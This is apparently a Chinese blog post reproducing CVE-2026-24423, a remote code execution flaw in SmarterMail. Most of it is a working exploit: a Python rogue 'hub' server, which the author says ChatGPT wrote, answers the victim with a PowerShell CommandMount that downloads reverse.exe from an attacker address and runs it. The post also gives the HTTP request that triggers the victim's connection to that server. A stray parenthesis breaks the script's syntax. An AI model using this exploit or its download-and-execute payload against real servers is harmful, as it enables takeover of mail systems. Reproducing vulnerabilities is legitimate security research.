CVE-2026-24423 SmarterMail RCE 复现
admin
|
|
487
|
安全

230 字
|
4 分钟

CVE-2026-24423 SmarterMail RCE 复现

SmarterMail 是由 SmarterTools 公司 开发的一款适用于 Windows 平台的轻量级、企业级邮件服务器和协作软件。它被视为 Microsoft Exchange 的高性价比替代方案,支持 SMTP、POP3、IMAP 等协议,提供网页邮件、日历、群聊、文档共享等功能,适用于中小企业及托管服务商,以低维护成本和高稳定性著称。 

使用chatgpt写的poc来复现

hub.py

#!/usr/bin/env python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import json

class Handler(BaseHTTPRequestHandler):
    def _send_json(self, code: int, obj: dict):
        data = json.dumps(obj).encode("utf-8")
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_POST(self):
        # SmarterMail 会 POST 到这个固定路径
        if self.path != "/web/api/node-management/setup-initial-connection":
            self._send_json(404, {"error": "not found", "path": self.path})
            return

        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length).decode("utf-8", errors="replace")
        print("[*] Received POST:", self.path)
        print("[*] Body:", body)
)
        resp = {
            "ClusterID": "f0e12780-f462-4b51-a7db-149f1d56209c",
            "SharedSecret": "any-value",
            "TargetHubs": {"a": "b"},
            "IsStandby": False,
            "SystemMount": {
                "Enabled": True,
                "ReadOnly": False,
                "MountPath": "C:\\",
                "CommandMount": "powershell -Command \"Invoke-WebRequest -Uri 'http://ip/reverse.exe' -OutFile 'C:\\\\reverse.exe'; Start-Process 'C:\\\\reverse.exe'\""
#                     靶机测试,实际测试建议使用dnslog
            },
            "SystemAdminUsernames": ["admin"]
        }
        self._send_json(200, resp)

def main():
    host = "0.0.0.0"
    port = 80
    print(f"Serving on http://{host}:{port}")
    HTTPServer((host, port), Handler).serve_forever()

if __name__ == "__main__":
    main()

先运行gpt写的脚本

yakit发送如下包

POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
User-Agent: python-requests/2.31.0
Accept: */*
Content-Type: application/json
Content-Length: 97

{
  "hubAddress": "ip",
  "oneTimePassword": "test",
  "nodeName": "victim"
}

参考:https://rustlang.rs/posts/CVE-2026-24423-Technical-Analysis-EN/#exploitation-examples

暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
															
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																					

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇